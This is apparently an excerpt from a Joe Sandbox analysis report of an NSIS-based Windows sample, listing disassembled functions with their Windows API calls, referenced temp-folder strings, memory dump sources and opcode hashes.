                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens
                                                                      • API String ID: 1892508949-74183469
                                                                      • Opcode ID: 04e6969c0dcd3601385fd0e2838c4dafd03fce5596fd6c1ac1cfe2f5b2968c32
                                                                      • Instruction ID: afd89d35c011052612b9933dc16c135e328f8afd03e06d15a27ba8224079e4e0
                                                                      • Opcode Fuzzy Hash: 04e6969c0dcd3601385fd0e2838c4dafd03fce5596fd6c1ac1cfe2f5b2968c32
                                                                      • Instruction Fuzzy Hash: AC112731508141EBDB217FB54D4197F36B49E96324F28453FE4D1B22E2DA3D4842AA2E
                                                                      APIs
                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406118,80000002), ref: 00405F1A
                                                                      • RegCloseKey.ADVAPI32(?,?,00406118,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll), ref: 00405F25
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID: Call
                                                                      • API String ID: 3356406503-1824292864
                                                                      • Opcode ID: 1030a17f86b53444e8a5a3b6bccfdd0324da9206876f6c82357e637410bb066d
                                                                      • Instruction ID: 2e4321f520f0c42760b8dd6c663e9e781067c597ec393d4c632fa8beed11a635
                                                                      • Opcode Fuzzy Hash: 1030a17f86b53444e8a5a3b6bccfdd0324da9206876f6c82357e637410bb066d
                                                                      • Instruction Fuzzy Hash: 3B019A7250020AAADF22CF20CC09FDB3BA8EF55360F00442AF904A2190D278CA54CFA8
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D50,Error launching installer), ref: 004056B5
                                                                      • CloseHandle.KERNEL32(?), ref: 004056C2
                                                                      Strings
                                                                      • Error launching installer, xrefs: 0040569F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: f0a19a88b4191ad482a62bb3ee09ede63fcf5498891b486954be21cba29d19c8
                                                                      • Instruction ID: 2140ebbf1eee4cb4891f52a8ff1fd75339fa61df53f1a1a9c1e04f6e33d43294
                                                                      • Opcode Fuzzy Hash: f0a19a88b4191ad482a62bb3ee09ede63fcf5498891b486954be21cba29d19c8
                                                                      • Instruction Fuzzy Hash: 40E0BFF5610209BFEB009FA4DE05F7B7BBDEB40704F404925BD10F2160D774A8148A78
                                                                      APIs
                                                                        • Part of subcall function 004056CF: ShellExecuteExA.SHELL32(?,00401F29,?), ref: 004056DE
                                                                        • Part of subcall function 004063FA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F43,?,?,?,?,?,?), ref: 0040640B
                                                                        • Part of subcall function 004063FA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040642D
                                                                      • CloseHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00401F8D
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens, xrefs: 00401F11
                                                                      • @, xrefs: 00401F31
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCodeExecuteExitHandleObjectProcessShellSingleWait
                                                                      • String ID: @$C:\Users\user\AppData\Local\Temp\unscorified\Kdgrydens
                                                                      • API String ID: 165873841-3594815859
                                                                      • Opcode ID: 8519022bf249ecbbc196bf988a98103f7eb23198aad2c35d86c9091ea44dd8f3
                                                                      • Instruction ID: 6fb4e818f2c942e9b4bba88a026eebdec746967c1f1042f55a0f18c21242a27d
                                                                      • Opcode Fuzzy Hash: 8519022bf249ecbbc196bf988a98103f7eb23198aad2c35d86c9091ea44dd8f3
                                                                      • Instruction Fuzzy Hash: DA113D71E042049ACB12EFB98A45A8DBFF4AF09318F24057BE555F72D2DBB88801DB18
                                                                      APIs
                                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040257E
                                                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402591
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$CloseValue
                                                                      • String ID:
                                                                      • API String ID: 397863658-0
                                                                      • Opcode ID: 5fdd96a4c8267d24c04b63ca7e37b561cfa3a4140926a300f230920ceefefb6b
                                                                      • Instruction ID: dbd097197b1ddcdec4c3bfd44c4d49ca57d6fe8d8a156bba66eafe5791494d89
                                                                      • Opcode Fuzzy Hash: 5fdd96a4c8267d24c04b63ca7e37b561cfa3a4140926a300f230920ceefefb6b
                                                                      • Instruction Fuzzy Hash: D801BCB1901204FFE711DF699E89ABF7ABCEB81344F10403EF442B62C0D6B84E009629
                                                                      APIs
                                                                        • Part of subcall function 00405B61: GetFileAttributesA.KERNELBASE(?,?,00405779,?,?,00000000,0040595C,?,?,?,?), ref: 00405B66
                                                                        • Part of subcall function 00405B61: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B7A
                                                                      • RemoveDirectoryA.KERNEL32(?,?,?,00000000,0040595C), ref: 00405788
                                                                      • DeleteFileA.KERNELBASE(?,?,?,00000000,0040595C), ref: 00405790
                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 004057A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: File$Attributes$DeleteDirectoryRemove
                                                                      • String ID:
                                                                      • API String ID: 1655745494-0
                                                                      • Opcode ID: 1b58439dbc4d5c75e8d4a1b60800a1a05f091bf10d9841f58e7402e1275724a5
                                                                      • Instruction ID: 89e2ffb4eeb90fd48554f64b8be6f4befc75c99c48748cc7a9a51ea4a82828fd
                                                                      • Opcode Fuzzy Hash: 1b58439dbc4d5c75e8d4a1b60800a1a05f091bf10d9841f58e7402e1275724a5
                                                                      • Instruction Fuzzy Hash: 79E0E531115A5096C21057348E0CB5F2A98DFC6724F05093AF992F30C0D77C49469A7E
                                                                      APIs
                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 0040250A
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3356406503-0
                                                                      • Opcode ID: 06f9a05988a77b4bdcc6cb49dfa9bbed22794e88a516823340940e2e8d0fbd08
                                                                      • Instruction ID: e432cc5542b3a476208e1b79bea1c70747d30db9775ab40f8372a11ce444457e
                                                                      • Opcode Fuzzy Hash: 06f9a05988a77b4bdcc6cb49dfa9bbed22794e88a516823340940e2e8d0fbd08
                                                                      • Instruction Fuzzy Hash: 5E118C71901205FEDB11CF64CA5D9AEBAB4AF19348F60447FE442B62C0D6B88A45DB2D
                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 7c42d570b17a0fed6318748d5d62b609da708fc0185faa880c17ecc6591740a1
                                                                      • Instruction ID: e022dd21a705f7d2fe13c48a1103892d377d282aa69ae92f3ff2ae7c0e9cbe23
                                                                      • Opcode Fuzzy Hash: 7c42d570b17a0fed6318748d5d62b609da708fc0185faa880c17ecc6591740a1
                                                                      • Instruction Fuzzy Hash: C601F4316202209FE7094B389D04B2A36A8E751354F10813FF955F65F2D678CC028B4C
                                                                      APIs
                                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402409
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402412
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: CloseDeleteValue
                                                                      • String ID:
                                                                      • API String ID: 2831762973-0
                                                                      • Opcode ID: 405a4329a5c828b21355242cc628517a7d900edba7cc5ebd2e5852863e1045d2
                                                                      • Instruction ID: 49501c94728b366df12ca2e4d909b612e79837c42632e001697d6088b151e408
                                                                      • Opcode Fuzzy Hash: 405a4329a5c828b21355242cc628517a7d900edba7cc5ebd2e5852863e1045d2
                                                                      • Instruction Fuzzy Hash: 5BF0BB32A00120ABD701AFB89B4DBAE72B99B54314F15417FF502B72C1D5FC5E01876D
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 0040260B
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll, xrefs: 004025FC, 00402621
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll
                                                                      • API String ID: 1659193697-777275547
                                                                      • Opcode ID: 98744e92278e77381a877ce22c2859315e27ca794b81704b9867eff1eeef6133
                                                                      • Instruction ID: 6bdf981ca1be840b674a071183a736e23abd1ab340c7258522d34cd24c38b4c9
                                                                      • Opcode Fuzzy Hash: 98744e92278e77381a877ce22c2859315e27ca794b81704b9867eff1eeef6133
                                                                      • Instruction Fuzzy Hash: 67F0E971948340ABC701EBB55A8999F66B4DBC5304B20483FE001B71C2C5BC4441961E
                                                                      APIs
                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401EAD
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401EB8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnableShow
                                                                      • String ID:
                                                                      • API String ID: 1136574915-0
                                                                      • Opcode ID: 30a7aefe36c03ed8ebba05a6927d3a517de9a20db24bb2af88aa016f02d7e68a
                                                                      • Instruction ID: 33cda2ed04c3da629839a1ed70eaf652a1c817d3d699623c6adcec252e127601
                                                                      • Opcode Fuzzy Hash: 30a7aefe36c03ed8ebba05a6927d3a517de9a20db24bb2af88aa016f02d7e68a
                                                                      • Instruction Fuzzy Hash: 4FE01272A04210DFD705DFA8AE859AE77B4FB84325F10493BE102F11D1D7B85841966D
                                                                      APIs
                                                                      • ShowWindow.USER32(00000000), ref: 00401581
                                                                      • ShowWindow.USER32(000103F8), ref: 00401596
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1863276400.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1863264921.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863289047.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863302208.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1863643039.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_sgJV11UlDP.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: e076315d432f252b18020cd23f11f5fa0b9b95d4c85057e9c40fbf447670c9d3
